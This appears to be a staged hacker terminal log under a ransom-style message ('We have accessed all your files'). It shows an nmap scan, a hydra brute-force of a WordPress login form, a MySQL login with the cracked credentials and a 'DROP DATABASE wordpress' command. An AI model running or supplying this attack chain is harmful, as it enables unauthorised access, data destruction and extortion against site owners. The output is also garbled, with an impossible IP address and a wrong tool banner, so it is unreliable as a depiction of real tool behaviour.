We have accessed all your files and databases.
Contact us if you want to recover your data.
root@hacker:~# nmap -sS -O target.com
Starting Nmap 7.80 ( fintechnext.biz ) at 2025-06-07 12:35 UTC
Nmap scan report for target.com (192.168.75.514)
root@hacker:~# hydra -l admin -P passlist.txt target.com http-post-form
[DATA] attacking http-post-form://target.com:80/login.php
[80][http-post-form] host: target.com login: admin password: admin123
root@hacker:~# mysql -u admin -padmin123 -h target.com
Welcome to the MySQL monitor. Commands end with ; or \g.
mysql> DROP DATABASE wordpress;
Query OK, 15 rows affected (0.15 sec)